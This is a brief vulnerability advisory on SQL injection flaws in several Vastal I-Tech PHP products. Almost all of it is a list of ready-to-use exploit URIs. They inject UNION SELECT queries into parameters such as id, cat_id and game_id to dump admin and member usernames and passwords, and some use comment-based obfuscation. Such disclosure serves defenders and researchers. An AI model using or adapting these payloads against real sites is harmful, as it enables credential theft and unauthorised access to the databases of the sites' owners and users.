Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities

Multiple Vastal I-Tech Products Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/view_news.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users

http://www.example.com/show_series_ink.php?id=-1+union+select+1,concat(admin_user,0x3a,admin_password),3,4,5+from+admin_users

http://www.example.com/view_news.php?news_id=-2+union+select+1,concat(admin_user,0x3a,admin_password),3,4+from+admin_users

http://example.com/view_product.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*

http://www.example.com/view_product.php?cat_id=-1/**/UNION/**/SELECT/**/concat_ws(0x3a,admin_user,admin_password)/**/from/**/admin_users/*

http://www.example.com/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,password,user()),3,4,5,6/**/members/*

http://www.example.com/game.php?yes=1&game_id=-1/**/UNION/**/SELECT/**/1,22222,3,4,5,6/*

http://www.example.com/view_mags.php?cat_id=-1/**/UNION/**/SELECT/**/concat(0x3a,password,0x3a)/**/FROM/**/members/*

http://www.example.com/view_cresume.php?coder_id=-1/**/UNION/**/SELECT/**/1,2,password,user(),5/**/from/**/members/*

http://www.example.com/view_products_cat.php?cat_id=-1/**/UNION/**/SELECT/**/1,concat_ws(0x3a,admin_user,admin_password),3,4,5,6,7/**/from/**/admin_users/*